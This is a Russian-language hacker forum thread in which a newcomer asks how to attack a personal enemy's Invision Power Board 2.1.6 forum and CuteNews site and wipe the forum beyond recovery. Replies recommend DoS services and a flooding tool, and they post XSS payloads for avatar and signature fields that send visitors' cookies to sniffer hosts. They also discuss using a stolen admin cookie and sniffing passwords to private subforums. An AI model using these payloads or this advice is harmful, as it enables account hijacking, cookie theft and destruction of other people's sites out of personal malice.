Уязвимости invision board версии 2.1.6?
 

Превед народ!!!
Я здесь новичек, так что сори за может быть глупый вопрос ...
Мне надо проучить кое-кого, но у него %:!"; стоит форум IPB 2.1.6
Я здесь перекопал темы но не нашел ничего по этой версии ... может что-то из 2.1.5 сгодиться?
У меня ведь модем пока что-то скачаешь умрешь ... а если не знаешь что работает а что нет ... подскажите ...
еще там форум русский, а я только инглишь нашел ... а где руссификацию найти?
помогите! мне б че нить попроще, типа xss ... и што б затереть фесь форум что б не восстановить было!


А еще сразу уж спрошу про CuteNews ... у него она стоит. т.к. в коде можно эту строчку найти.
Но прикол в том что он кажись переименовал или переместил дефолтную страницу входа (где лог и пароль вводишь) в панель управления.
Я уже все перекопал, в поисковиках существующие страницы сайта смотрел, и через статистику маил.ру, так и не нашел где пароль вводить что б в панель попасть ...
При том что новости не только он :*!":*;!"; админ пишет, но и другие юзеры!!! А на сайте автаризации вообще нету ... или скорее я ее не нашел ...
народ подскажите! Как быть ... как найти куда пароль писать ... как убить заодно кутеневс эти гакие!

Помойму самое простое решение устроить дос форуму. Поищи людей у которых есть дос-сервис. И пипец форуму.

для этой версии багов вроде бы не найдено пока...насколько я знаю...

xss от пятой должен подойти. поройся в античате здесь уже есть 2 темы об этом.

Ну восстановить форум то можно всегда. Если бэкапы базы регулярные.
А так XSS через аватару должна работать.
http://forum.antichat.ru/threadnav17358-5-10.html

Я не очень соглосен на счот Backup-a.Стиру админские акаунтъй и потом базу.

http://carpet-master.ru/FloodSources.rar
эта прога флудит ipb
можно сильно зафлудить форум

Ну...
Бэк ап можно и на другие диски сделать. Хотя на некоторое время форум точно ляжет.

А на счет жалобы? тут видео было. или оно только до 1.2.4?

Ребят Ipb мне при запросе алерт кинул! ато нормально?
короче я залез на форум, и зделал запрос javascript:alert('lamo'). если это можно использовать скажите мне что я умный :) если нет то ниче не говорите
P.S.
я тока начинаю

Возможно можно стырить куки.
Уж это то тут точно есть.
Просто всесто алерта надо отсылку на сниффер вписать.
Попробуй например:

че за бред !!!!!!! пишу :
javascript:x=document.cookie%3Bimg=new%20Image()%3 Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif
мне говорит :
Не выбрано ни одного аватара. Вернитесь назад и исправьте ошибку. !!!!!!!!!!!!!!!!!
версия форума - v2.1.6
пробол в 2.14 тож непашет !!!!!!!!!!!!!!!!!!!

Для 2.1.4 есть другая уязвимость на форум античата.Поисчи и попробуй на 2.1.6..

Через аватар реально работает
Но стырил куки, подделал, зашел как админ, ..... что дальше?

А ничего :(
Соль не даст расшифровать.
Кстати...
Подмена странички работает через аватару?
По идее должна. Не проверял.

Вот в коде img.src = "http://" Заменю ссылку на свой снифер и используй куки. Если фильтрует кавычки и т.д,то используй программу URI crypter, чтобы закодировать те символы которые фильтруються!

я ж говорю, через аватар работает. На данный момент у меня есть подделанный куки админа форума, но расшифровать куки без соли нельзя, вопрос в другом, можно ли каким-нибудь образом использовать то, что логинюсь под админом? хоть какие идеи есть?

Например, можно ли как-нибудь использовать права админа на добавление в календарь какого-нить события и т.д. :confused:

Думаю да.
Можно ещё отсниффать пароли к внутренним форумам и полазать по ним.
Зависит от настроек форума.

Ну а как тогда быть, если нет возможности загрузить аватар с другого адреса?
Если ацкий админ выключил в админке эту возможность?

Ладно пацан я хочу тебе сказать что существует сайт который как-раз подходит к решению и к решению любой проблемы связаной с Уязвимостью . Этот сайт называется securityfocus.
Зайди сюда:http://www.securityfocus.com/vulnerabilities
найди invision power services потом в нижнем окне напиши invision power board и вследущем окне выбири версию форума.

Надеюсь я тебе помог.
dracula4ever

фильтрует текст, слабо заменить?впринцыпе должно прокатить.

а если на форуме выключена поддержка загрузки аватар из нета? только с локальной ашины=(
Пробовал в подпись тоже не жрет

Да просто заплатку сделали уже)))

Народ пробуйте вставить в подпись:

<span style='color:#EEF2F7'><span style='color:<img src='http://aaa.aa/=`aaa.jpg' border='0' alt='user posted image' />'>` style=background:url(javascript:document.images[1].src="http://10.12.1.24/snifer/s.gif?"+document.cookie) </span></span>

или вот:
[CO*LOR=[IM*G]http://aaa.aa/=`aaa.jpg[/IM*G]]` style=background:url(javascript:document.images[1].src="http://10.12.1.24/snifer/s.gif?"+document.cookie [/COL*OR] без *


у меня работает =)

дай код поточнее т.к. то что ты дал не работает лично у меня на 2.1.6

хм.. тоже непонял.... зачем например в коде есть `?

Ребят попробуйте в подписи вставить список.

[_list = 1]

<table border="1"><tr><td width="100" height="50"></td></tr></table>
<короче тут можно написать свою станичку>

[_/list]
(без земли)

но </script> и javascript: он сечет

гы. до эксперементировал! у меня терь кнопка "Обноить подпись" не срабатывает

ссылка битая! скажите где скачать мона! оч надо!

НЕ слабо, заменил, а толку... Тоже самое пишет :(

это его так сам форум поуродовал

Ну я вставил это в подпись, и что должно произойти???

там где _http://10.12.1.24/snifer/s.gif надо писать адрес своего снифера и когда ктото прочтет сообщение его куки придут на снифер =)

ИМХО:
читай розделы: Новичкам и XSS Крупным планом

да не работает оно просто на 2.1.6 вот и все (у меня)
обратные кавычки фильтруются
дай точный BB код а не результат или это бред просто